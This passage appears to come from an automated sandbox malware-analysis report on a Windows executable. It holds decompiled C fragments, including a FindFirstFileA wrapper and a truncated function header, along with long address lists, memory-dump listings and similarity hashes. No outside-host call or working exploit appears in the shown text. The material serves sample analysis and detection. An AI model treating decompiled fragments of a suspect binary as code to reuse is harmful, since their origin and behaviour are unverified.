									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                    0x00000000
                                                                                                                    0x004061d4
                                                                                                                    0x004061d4
                                                                                                                    0x004061d9
                                                                                                                    0x00406250
                                                                                                                    0x00406257
                                                                                                                    0x00406261
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406849
                                                                                                                    0x0040684f
                                                                                                                    0x00406855
                                                                                                                    0x0040686f
                                                                                                                    0x00406872
                                                                                                                    0x00406878
                                                                                                                    0x00406883
                                                                                                                    0x00406885
                                                                                                                    0x00406857
                                                                                                                    0x00406857
                                                                                                                    0x00406866
                                                                                                                    0x0040686a
                                                                                                                    0x0040686a
                                                                                                                    0x0040688f
                                                                                                                    0x004068b6
                                                                                                                    0x004068b6
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x00406891
                                                                                                                    0x00406891
                                                                                                                    0x00406895
                                                                                                                    0x00406a44
                                                                                                                    0x00000000
                                                                                                                    0x00406a44
                                                                                                                    0x004068a1
                                                                                                                    0x004068a8
                                                                                                                    0x004068b0
                                                                                                                    0x004068b3
                                                                                                                    0x00000000
                                                                                                                    0x004068b3
                                                                                                                    0x004061db
                                                                                                                    0x004061db
                                                                                                                    0x004061df
                                                                                                                    0x004061e7
                                                                                                                    0x004061ea
                                                                                                                    0x004061ec
                                                                                                                    0x004061ef
                                                                                                                    0x004061f1
                                                                                                                    0x004061f6
                                                                                                                    0x004061f9
                                                                                                                    0x00406200
                                                                                                                    0x00406207
                                                                                                                    0x0040620a
                                                                                                                    0x00406215
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x00406224
                                                                                                                    0x00406242
                                                                                                                    0x00406244
                                                                                                                    0x00406417
                                                                                                                    0x00406417
                                                                                                                    0x0040641a
                                                                                                                    0x0040641d
                                                                                                                    0x00406420
                                                                                                                    0x00406423
                                                                                                                    0x00406426
                                                                                                                    0x00406429
                                                                                                                    0x0040642c
                                                                                                                    0x0040642f
                                                                                                                    0x00406435
                                                                                                                    0x0040644d
                                                                                                                    0x00406450
                                                                                                                    0x00406453
                                                                                                                    0x00406456
                                                                                                                    0x00406456
                                                                                                                    0x00406459
                                                                                                                    0x0040645f
                                                                                                                    0x00406437
                                                                                                                    0x00406437
                                                                                                                    0x0040643f
                                                                                                                    0x00406444
                                                                                                                    0x00406446
                                                                                                                    0x00406448
                                                                                                                    0x00406448
                                                                                                                    0x00406469
                                                                                                                    0x0040646c
                                                                                                                    0x0040640f
                                                                                                                    0x00406415
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x004063ea
                                                                                                                    0x004063ee
                                                                                                                    0x004069f6
                                                                                                                    0x00000000
                                                                                                                    0x004069f6
                                                                                                                    0x004063f4
                                                                                                                    0x004063f7
                                                                                                                    0x004063fa
                                                                                                                    0x004063fe
                                                                                                                    0x00406401
                                                                                                                    0x00406407
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x0040640c
                                                                                                                    0x00000000
                                                                                                                    0x0040640c
                                                                                                                    0x00406226
                                                                                                                    0x00406226
                                                                                                                    0x00406229
                                                                                                                    0x0040622f
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406234
                                                                                                                    0x00406237
                                                                                                                    0x00406239
                                                                                                                    0x0040623a
                                                                                                                    0x0040623d
                                                                                                                    0x004062aa
                                                                                                                    0x004062aa
                                                                                                                    0x004062ae
                                                                                                                    0x004062b1
                                                                                                                    0x004062b4
                                                                                                                    0x004062b7
                                                                                                                    0x004062ba
                                                                                                                    0x004062bb
                                                                                                                    0x004062be
                                                                                                                    0x004062c0
                                                                                                                    0x004062c6
                                                                                                                    0x004062c9
                                                                                                                    0x004062cc
                                                                                                                    0x004062cf
                                                                                                                    0x004062d2
                                                                                                                    0x004062d8
                                                                                                                    0x004062f4
                                                                                                                    0x004062f7
                                                                                                                    0x004062fa
                                                                                                                    0x004062fd
                                                                                                                    0x00406304
                                                                                                                    0x0040630a
                                                                                                                    0x0040630e
                                                                                                                    0x004062da
                                                                                                                    0x004062da
                                                                                                                    0x004062de
                                                                                                                    0x004062e6
                                                                                                                    0x004062eb
                                                                                                                    0x004062ed
                                                                                                                    0x004062ef
                                                                                                                    0x004062ef
                                                                                                                    0x00406318
                                                                                                                    0x0040631b
                                                                                                                    0x00406292
                                                                                                                    0x00406292
                                                                                                                    0x00406298
                                                                                                                    0x0040634b
                                                                                                                    0x00406351
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406353
                                                                                                                    0x00406356
                                                                                                                    0x00406359
                                                                                                                    0x0040635c
                                                                                                                    0x0040635f
                                                                                                                    0x00406362
                                                                                                                    0x00406365
                                                                                                                    0x00406368
                                                                                                                    0x0040636b
                                                                                                                    0x00406371
                                                                                                                    0x00406389
                                                                                                                    0x0040638c
                                                                                                                    0x0040638f
                                                                                                                    0x00406392
                                                                                                                    0x00406392
                                                                                                                    0x00406395
                                                                                                                    0x0040639b
                                                                                                                    0x00406373
                                                                                                                    0x00406373
                                                                                                                    0x0040637b
                                                                                                                    0x00406380
                                                                                                                    0x00406382
                                                                                                                    0x00406384
                                                                                                                    0x00406384
                                                                                                                    0x004063a5
                                                                                                                    0x004063a8
                                                                                                                    0x00406326
                                                                                                                    0x0040632a
                                                                                                                    0x004069ea
                                                                                                                    0x00000000
                                                                                                                    0x004069ea
                                                                                                                    0x00406330
                                                                                                                    0x00406333
                                                                                                                    0x00406336
                                                                                                                    0x0040633a
                                                                                                                    0x0040633d
                                                                                                                    0x00406343
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406348
                                                                                                                    0x00406348
                                                                                                                    0x004063a8
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063b3
                                                                                                                    0x004063b3
                                                                                                                    0x004063b6
                                                                                                                    0x004063b9
                                                                                                                    0x004063bd
                                                                                                                    0x00406a02
                                                                                                                    0x00000000
                                                                                                                    0x00406a02
                                                                                                                    0x004063c3
                                                                                                                    0x004063c6
                                                                                                                    0x004063c9
                                                                                                                    0x004063cc
                                                                                                                    0x004063cf
                                                                                                                    0x004063d2
                                                                                                                    0x004063d5
                                                                                                                    0x004063d7
                                                                                                                    0x004063da
                                                                                                                    0x004063dd
                                                                                                                    0x004063e0
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x0040657f
                                                                                                                    0x0040657f
                                                                                                                    0x00406582
                                                                                                                    0x00406582
                                                                                                                    0x00000000
                                                                                                                    0x00406582
                                                                                                                    0x004062a4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x0040626d
                                                                                                                    0x00406271
                                                                                                                    0x004069de
                                                                                                                    0x00406a5a
                                                                                                                    0x00406a62
                                                                                                                    0x00406a69
                                                                                                                    0x00406a6b
                                                                                                                    0x00406a72
                                                                                                                    0x00406a76
                                                                                                                    0x00406a76
                                                                                                                    0x00406277
                                                                                                                    0x0040627a
                                                                                                                    0x0040627d
                                                                                                                    0x00406281
                                                                                                                    0x00406284
                                                                                                                    0x0040628a
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628f
                                                                                                                    0x00000000
                                                                                                                    0x0040628f
                                                                                                                    0x0040631b
                                                                                                                    0x00406224
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406061
                                                                                                                    0x00406a6f
                                                                                                                    0x00406a6f
                                                                                                                    0x00000000
                                                                                                                    0x00406a6f
                                                                                                                    0x00406067
                                                                                                                    0x00000000
                                                                                                                    0x00406072
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040607b
                                                                                                                    0x0040607e
                                                                                                                    0x00406081
                                                                                                                    0x00406085
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040608b
                                                                                                                    0x0040608e
                                                                                                                    0x00406090
                                                                                                                    0x00406091
                                                                                                                    0x00406094
                                                                                                                    0x00406096
                                                                                                                    0x00406097
                                                                                                                    0x00406099
                                                                                                                    0x0040609c
                                                                                                                    0x004060a1
                                                                                                                    0x004060a6
                                                                                                                    0x004060af
                                                                                                                    0x004060c2
                                                                                                                    0x004060c5
                                                                                                                    0x004060d1
                                                                                                                    0x004060f9
                                                                                                                    0x004060fb
                                                                                                                    0x00406109
                                                                                                                    0x00406109
                                                                                                                    0x0040610d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060fd
                                                                                                                    0x00406100
                                                                                                                    0x00406101
                                                                                                                    0x00406101
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060d7
                                                                                                                    0x004060dc
                                                                                                                    0x004060dc
                                                                                                                    0x004060e5
                                                                                                                    0x004060ed
                                                                                                                    0x004060f0
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x00406113
                                                                                                                    0x00406113
                                                                                                                    0x00406117
                                                                                                                    0x004069c3
                                                                                                                    0x00000000
                                                                                                                    0x004069c3
                                                                                                                    0x00406120
                                                                                                                    0x00406130
                                                                                                                    0x00406133
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406139
                                                                                                                    0x0040613d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040613f
                                                                                                                    0x00406145
                                                                                                                    0x0040616f
                                                                                                                    0x00406175
                                                                                                                    0x0040617c
                                                                                                                    0x00000000
                                                                                                                    0x0040617c
                                                                                                                    0x0040614b
                                                                                                                    0x0040614e
                                                                                                                    0x00406153
                                                                                                                    0x00406153
                                                                                                                    0x0040615e
                                                                                                                    0x00406166
                                                                                                                    0x00406169
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061ae
                                                                                                                    0x004061b4
                                                                                                                    0x004061b7
                                                                                                                    0x004061c4
                                                                                                                    0x004061cc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406183
                                                                                                                    0x00406183
                                                                                                                    0x00406187
                                                                                                                    0x004069d2
                                                                                                                    0x00000000
                                                                                                                    0x004069d2
                                                                                                                    0x00406193
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x004061a1
                                                                                                                    0x004061a4
                                                                                                                    0x004061a7
                                                                                                                    0x004061ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406473
                                                                                                                    0x00406477
                                                                                                                    0x00406495
                                                                                                                    0x00406498
                                                                                                                    0x0040649f
                                                                                                                    0x004064a2
                                                                                                                    0x004064a5
                                                                                                                    0x004064a8
                                                                                                                    0x004064ab
                                                                                                                    0x004064ae
                                                                                                                    0x004064b0
                                                                                                                    0x004064b7
                                                                                                                    0x004064b8
                                                                                                                    0x004064ba
                                                                                                                    0x004064bd
                                                                                                                    0x004064c0
                                                                                                                    0x004064c3
                                                                                                                    0x004064c3
                                                                                                                    0x004064c8
                                                                                                                    0x00000000
                                                                                                                    0x004064c8
                                                                                                                    0x00406479
                                                                                                                    0x0040647c
                                                                                                                    0x0040647f
                                                                                                                    0x00406489
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004064dd
                                                                                                                    0x004064e1
                                                                                                                    0x00406504
                                                                                                                    0x00406507
                                                                                                                    0x0040650a
                                                                                                                    0x00406514
                                                                                                                    0x004064e3
                                                                                                                    0x004064e3
                                                                                                                    0x004064e6
                                                                                                                    0x004064e9
                                                                                                                    0x004064ec
                                                                                                                    0x004064f9
                                                                                                                    0x004064fc
                                                                                                                    0x004064fc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406520
                                                                                                                    0x00406524
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040652a
                                                                                                                    0x0040652e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406534
                                                                                                                    0x00406536
                                                                                                                    0x0040653a
                                                                                                                    0x0040653a
                                                                                                                    0x0040653d
                                                                                                                    0x00406541
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406591
                                                                                                                    0x00406595
                                                                                                                    0x0040659c
                                                                                                                    0x0040659f
                                                                                                                    0x004065a2
                                                                                                                    0x004065ac
                                                                                                                    0x00000000
                                                                                                                    0x004065ac
                                                                                                                    0x00406597
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065b8
                                                                                                                    0x004065bc
                                                                                                                    0x004065c3
                                                                                                                    0x004065c6
                                                                                                                    0x004065c9
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065cc
                                                                                                                    0x004065cf
                                                                                                                    0x004065d2
                                                                                                                    0x004065d2
                                                                                                                    0x004065d5
                                                                                                                    0x004065d8
                                                                                                                    0x004065db
                                                                                                                    0x004065db
                                                                                                                    0x004065de
                                                                                                                    0x004065e5
                                                                                                                    0x004065ea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406678
                                                                                                                    0x00406678
                                                                                                                    0x0040667c
                                                                                                                    0x00406a1a
                                                                                                                    0x00000000
                                                                                                                    0x00406a1a
                                                                                                                    0x00406682
                                                                                                                    0x00406685
                                                                                                                    0x00406688
                                                                                                                    0x0040668c
                                                                                                                    0x0040668f
                                                                                                                    0x00406695
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x0040669a
                                                                                                                    0x0040669d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004066fb
                                                                                                                    0x004066fb
                                                                                                                    0x004066ff
                                                                                                                    0x00406a26
                                                                                                                    0x00000000
                                                                                                                    0x00406a26
                                                                                                                    0x00406705
                                                                                                                    0x00406708
                                                                                                                    0x0040670b
                                                                                                                    0x0040670f
                                                                                                                    0x00406712
                                                                                                                    0x00406718
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004064cb
                                                                                                                    0x004064cb
                                                                                                                    0x004064ce
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040680a
                                                                                                                    0x0040680e
                                                                                                                    0x00406830
                                                                                                                    0x00406833
                                                                                                                    0x0040683d
                                                                                                                    0x00000000
                                                                                                                    0x0040683d
                                                                                                                    0x00406810
                                                                                                                    0x00406813
                                                                                                                    0x00406817
                                                                                                                    0x0040681a
                                                                                                                    0x0040681a
                                                                                                                    0x0040681d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004068c7
                                                                                                                    0x004068cb
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068f0
                                                                                                                    0x004068f7
                                                                                                                    0x004068fe
                                                                                                                    0x004068fe
                                                                                                                    0x00000000
                                                                                                                    0x004068fe
                                                                                                                    0x004068cd
                                                                                                                    0x004068d0
                                                                                                                    0x004068d3
                                                                                                                    0x004068d6
                                                                                                                    0x004068dd
                                                                                                                    0x00406821
                                                                                                                    0x00406821
                                                                                                                    0x00406824
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004069b8
                                                                                                                    0x004069bb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065f2
                                                                                                                    0x004065f4
                                                                                                                    0x004065fb
                                                                                                                    0x004065fc
                                                                                                                    0x004065fe
                                                                                                                    0x00406601
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406609
                                                                                                                    0x0040660c
                                                                                                                    0x0040660f
                                                                                                                    0x00406611
                                                                                                                    0x00406613
                                                                                                                    0x00406613
                                                                                                                    0x00406614
                                                                                                                    0x00406617
                                                                                                                    0x0040661e
                                                                                                                    0x00406621
                                                                                                                    0x0040662f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406905
                                                                                                                    0x00406905
                                                                                                                    0x00406908
                                                                                                                    0x0040690f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406914
                                                                                                                    0x00406914
                                                                                                                    0x00406918
                                                                                                                    0x00406a50
                                                                                                                    0x00000000
                                                                                                                    0x00406a50
                                                                                                                    0x0040691e
                                                                                                                    0x00406921
                                                                                                                    0x00406924
                                                                                                                    0x00406928
                                                                                                                    0x0040692b
                                                                                                                    0x00406931
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406936
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x0040693c
                                                                                                                    0x0040693c
                                                                                                                    0x00406940
                                                                                                                    0x004069a0
                                                                                                                    0x004069a3
                                                                                                                    0x004069a8
                                                                                                                    0x004069a9
                                                                                                                    0x004069ab
                                                                                                                    0x004069ad
                                                                                                                    0x004069b0
                                                                                                                    0x00000000
                                                                                                                    0x004069b0
                                                                                                                    0x00406942
                                                                                                                    0x00406948
                                                                                                                    0x0040694b
                                                                                                                    0x0040694e
                                                                                                                    0x00406951
                                                                                                                    0x00406954
                                                                                                                    0x00406957
                                                                                                                    0x0040695a
                                                                                                                    0x0040695d
                                                                                                                    0x00406960
                                                                                                                    0x00406963
                                                                                                                    0x0040697c
                                                                                                                    0x0040697f
                                                                                                                    0x00406982
                                                                                                                    0x00406985
                                                                                                                    0x00406989
                                                                                                                    0x0040698b
                                                                                                                    0x0040698b
                                                                                                                    0x0040698c
                                                                                                                    0x0040698f
                                                                                                                    0x00406965
                                                                                                                    0x00406965
                                                                                                                    0x0040696d
                                                                                                                    0x00406972
                                                                                                                    0x00406974
                                                                                                                    0x00406977
                                                                                                                    0x00406977
                                                                                                                    0x00406992
                                                                                                                    0x00406999
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x00406637
                                                                                                                    0x0040663a
                                                                                                                    0x00406670
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a3
                                                                                                                    0x004067a3
                                                                                                                    0x004067a6
                                                                                                                    0x004067a8
                                                                                                                    0x00406a32
                                                                                                                    0x00000000
                                                                                                                    0x00406a32
                                                                                                                    0x004067ae
                                                                                                                    0x004067b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067b7
                                                                                                                    0x004067bb
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x00000000
                                                                                                                    0x004067be
                                                                                                                    0x0040663c
                                                                                                                    0x0040663e
                                                                                                                    0x00406640
                                                                                                                    0x00406642
                                                                                                                    0x00406645
                                                                                                                    0x00406646
                                                                                                                    0x00406648
                                                                                                                    0x0040664a
                                                                                                                    0x0040664d
                                                                                                                    0x00406650
                                                                                                                    0x00406666
                                                                                                                    0x0040666b
                                                                                                                    0x004066a3
                                                                                                                    0x004066a3
                                                                                                                    0x004066a7
                                                                                                                    0x004066d3
                                                                                                                    0x004066d5
                                                                                                                    0x004066dc
                                                                                                                    0x004066df
                                                                                                                    0x004066e2
                                                                                                                    0x004066e2
                                                                                                                    0x004066e7
                                                                                                                    0x004066e7
                                                                                                                    0x004066e9
                                                                                                                    0x004066ec
                                                                                                                    0x004066f3
                                                                                                                    0x004066f6
                                                                                                                    0x00406723
                                                                                                                    0x00406723
                                                                                                                    0x00406726
                                                                                                                    0x00406729
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x00000000
                                                                                                                    0x0040679d
                                                                                                                    0x0040672b
                                                                                                                    0x00406731
                                                                                                                    0x00406734
                                                                                                                    0x00406737
                                                                                                                    0x0040673a
                                                                                                                    0x0040673d
                                                                                                                    0x00406740
                                                                                                                    0x00406743
                                                                                                                    0x00406746
                                                                                                                    0x00406749
                                                                                                                    0x0040674c
                                                                                                                    0x00406765
                                                                                                                    0x00406767
                                                                                                                    0x0040676a
                                                                                                                    0x0040676b
                                                                                                                    0x0040676e
                                                                                                                    0x00406770
                                                                                                                    0x00406773
                                                                                                                    0x00406775
                                                                                                                    0x00406777
                                                                                                                    0x0040677a
                                                                                                                    0x0040677c
                                                                                                                    0x0040677f
                                                                                                                    0x00406783
                                                                                                                    0x00406785
                                                                                                                    0x00406785
                                                                                                                    0x00406786
                                                                                                                    0x00406789
                                                                                                                    0x0040678c
                                                                                                                    0x0040674e
                                                                                                                    0x0040674e
                                                                                                                    0x00406756
                                                                                                                    0x0040675b
                                                                                                                    0x0040675d
                                                                                                                    0x00406760
                                                                                                                    0x00406760
                                                                                                                    0x0040678f
                                                                                                                    0x00406796
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00406796
                                                                                                                    0x004066a9
                                                                                                                    0x004066ac
                                                                                                                    0x004066ae
                                                                                                                    0x004066b1
                                                                                                                    0x004066b4
                                                                                                                    0x004066b7
                                                                                                                    0x004066b9
                                                                                                                    0x004066bc
                                                                                                                    0x004066bf
                                                                                                                    0x004066bf
                                                                                                                    0x004066c2
                                                                                                                    0x004066c2
                                                                                                                    0x004066c5
                                                                                                                    0x004066cc
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x004066cc
                                                                                                                    0x00406652
                                                                                                                    0x00406655
                                                                                                                    0x00406657
                                                                                                                    0x0040665a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406544
                                                                                                                    0x00406544
                                                                                                                    0x00406548
                                                                                                                    0x00406a0e
                                                                                                                    0x00000000
                                                                                                                    0x00406a0e
                                                                                                                    0x0040654e
                                                                                                                    0x00406551
                                                                                                                    0x00406554
                                                                                                                    0x00406557
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x0040655c
                                                                                                                    0x0040655f
                                                                                                                    0x00406562
                                                                                                                    0x00406565
                                                                                                                    0x00406568
                                                                                                                    0x0040656b
                                                                                                                    0x0040656c
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x00406571
                                                                                                                    0x00406574
                                                                                                                    0x00406577
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067cb
                                                                                                                    0x004067ce
                                                                                                                    0x004067d1
                                                                                                                    0x004067d4
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d9
                                                                                                                    0x004067dc
                                                                                                                    0x004067df
                                                                                                                    0x004067e2
                                                                                                                    0x004067e5
                                                                                                                    0x004067e8
                                                                                                                    0x004067e9
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067ee
                                                                                                                    0x004067f1
                                                                                                                    0x004067f4
                                                                                                                    0x004067f7
                                                                                                                    0x004067fa
                                                                                                                    0x004067fe
                                                                                                                    0x00406800
                                                                                                                    0x00406803
                                                                                                                    0x00000000
                                                                                                                    0x00406805
                                                                                                                    0x00000000
                                                                                                                    0x00406805
                                                                                                                    0x00406803
                                                                                                                    0x00406a38
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                                                                                    • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                                                                                                    • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                                                                                    • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405E93, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00405E93(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422588); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422588;
			}




                                                                                                                    0x00405e9e
                                                                                                                    0x00405ea7
                                                                                                                    0x00000000
                                                                                                                    0x00405eb4
                                                                                                                    0x00405eaa
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • FindFirstFileA.KERNELBASE(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405EAA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2295610775-0
                                                                                                                    • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                                                                                    • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                                                                                                    • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                                                                                    • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004035EB, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E004035EB(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
